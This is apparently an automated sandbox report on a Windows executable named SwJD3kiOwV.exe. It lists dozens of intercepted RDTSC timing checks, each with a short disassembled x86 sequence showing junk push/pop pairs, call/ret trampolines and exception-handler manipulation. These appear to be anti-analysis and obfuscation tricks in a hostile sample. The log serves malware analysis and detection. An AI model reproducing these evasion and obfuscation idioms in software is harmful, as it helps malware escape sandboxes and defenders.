Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12990FE second address: 129910F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4970E062CAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1299B6D second address: 1299BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F4970D67E8Dh 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4970D67E90h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129B2FF second address: 129B304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E9B9 second address: 129E9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E9BD second address: 129E9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129EF65 second address: 129EF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129EF75 second address: 129F021 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007F4970E062CEh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F4970E062C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d jmp 00007F4970E062D8h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F4970E062C8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e jmp 00007F4970E062D9h 0x00000053 or ebx, dword ptr [ebp+122D2AADh] 0x00000059 push 00000000h 0x0000005b mov ebx, dword ptr [ebp+122D2C45h] 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 push ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129F021 second address: 129F05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F4970D67E8Ah 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F4970D67E98h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F4970D67E86h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129F19C second address: 129F1A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A2698 second address: 12A2710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b add di, FE4Eh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F4970D67E88h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c sbb bx, DA10h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F4970D67E88h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d jl 00007F4970D67E8Bh 0x00000053 mov edi, 15F35EE0h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129F1A2 second address: 129F240 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jng 00007F4970E062C8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 nop 0x00000014 push dword ptr fs:[00000000h] 0x0000001b and ebx, 2EA53935h 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D386Ah], edx 0x0000002e mov eax, dword ptr [ebp+122D15E1h] 0x00000034 call 00007F4970E062CEh 0x00000039 stc 0x0000003a pop ebx 0x0000003b mov di, cx 0x0000003e push FFFFFFFFh 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007F4970E062C8h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a call 00007F4970E062D5h 0x0000005f xor dword ptr [ebp+122D1D76h], eax 0x00000065 pop ebx 0x00000066 or di, 19B2h 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F4970E062D5h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A2710 second address: 12A2716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A2716 second address: 12A271B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A271B second address: 12A2730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A376A second address: 12A376F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A289C second address: 12A28AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F4970D67E86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A376F second address: 12A3774 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A3774 second address: 12A3810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F4970D67E88h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 call 00007F4970D67E98h 0x00000029 jmp 00007F4970D67E99h 0x0000002e pop ebx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F4970D67E88h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b or edi, dword ptr [ebp+122D2901h] 0x00000051 push 00000000h 0x00000053 or dword ptr [ebp+122D55AFh], edi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jl 00007F4970D67E86h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A3810 second address: 12A3814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A3814 second address: 12A381A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A381A second address: 12A3820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A4798 second address: 12A47A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E8Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A3A09 second address: 12A3A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A3A0D second address: 12A3A13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A3A13 second address: 12A3A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970E062CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A6750 second address: 12A6761 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007F4970D67E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A6761 second address: 12A6788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edx 0x00000007 push edx 0x00000008 jmp 00007F4970E062CBh 0x0000000d jmp 00007F4970E062CDh 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1251471 second address: 1251494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F4970D67E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F4970D67E8Ch 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnl 00007F4970D67E86h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A7CAB second address: 12A7CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A7CBE second address: 12A7CD6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4970D67E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jp 00007F4970D67E86h 0x00000014 pop eax 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A7F9F second address: 12A7FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A9E74 second address: 12A9E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A9E7C second address: 12A9EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007F4970E062CAh 0x0000000d nop 0x0000000e cld 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F4970E062C8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e movzx ebx, bx 0x00000031 pop edi 0x00000032 mov di, 2F38h 0x00000036 push eax 0x00000037 push edx 0x00000038 jc 00007F4970E062CCh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12A8FF4 second address: 12A8FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12AADD1 second address: 12AADD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12ABD3D second address: 12ABD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12ABD41 second address: 12ABD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12ABD5B second address: 12ABD61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12AA0AF second address: 12AA0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B0BE7 second address: 12B0BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12AA0B4 second address: 12AA0BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4970E062C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12AFC97 second address: 12AFCC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4970D67E93h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1BBD second address: 12B1BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1BC3 second address: 12B1BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1BC7 second address: 12B1BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1BCB second address: 12B1C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F4970D67E88h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D194Dh] 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e jo 00007F4970D67E87h 0x00000034 cmc 0x00000035 pop ebx 0x00000036 push 00000000h 0x00000038 add ebx, dword ptr [ebp+122D1BC9h] 0x0000003e push eax 0x0000003f pushad 0x00000040 jmp 00007F4970D67E8Eh 0x00000045 pushad 0x00000046 push edx 0x00000047 pop edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B2AFD second address: 12B2B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1D44 second address: 12B1D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1D4A second address: 12B1D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1D4E second address: 12B1D77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F4970D67E86h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1D77 second address: 12B1D80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1D80 second address: 12B1E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F4970D67E99h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 jno 00007F4970D67E8Ch 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 ja 00007F4970D67E86h 0x00000026 mov eax, dword ptr [ebp+122D0781h] 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F4970D67E88h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007F4970D67E88h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 0000001Ch 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 mov dword ptr [ebp+1245EFBCh], ecx 0x00000068 nop 0x00000069 push ecx 0x0000006a jmp 00007F4970D67E99h 0x0000006f pop ecx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push ebx 0x00000076 pop ebx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12B1E36 second address: 12B1E3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BB1D3 second address: 12BB1DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BB1DB second address: 12BB1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BB1DF second address: 12BB1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BB1E3 second address: 12BB1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F4970E062C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BB1F3 second address: 12BB1F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BF039 second address: 12BF051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970E062D2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BF051 second address: 12BF055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BF055 second address: 12BF09F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F4970E062D1h 0x00000011 jmp 00007F4970E062D8h 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BE9D8 second address: 12BE9EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BE9EA second address: 12BEA05 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4970E062D6h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BEA05 second address: 12BEA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4970D67E86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BEA1B second address: 12BEA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BEBB5 second address: 12BEBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12BEBBE second address: 12BEBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C093F second address: 12C0945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C0945 second address: 12C094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C094E second address: 12C0958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4970D67E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C0958 second address: 12C0979 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4970E062D5h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C0979 second address: 12C0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C5749 second address: 12C574F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1297391 second address: 1297395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CAC1B second address: 12CAC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F4970E062C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
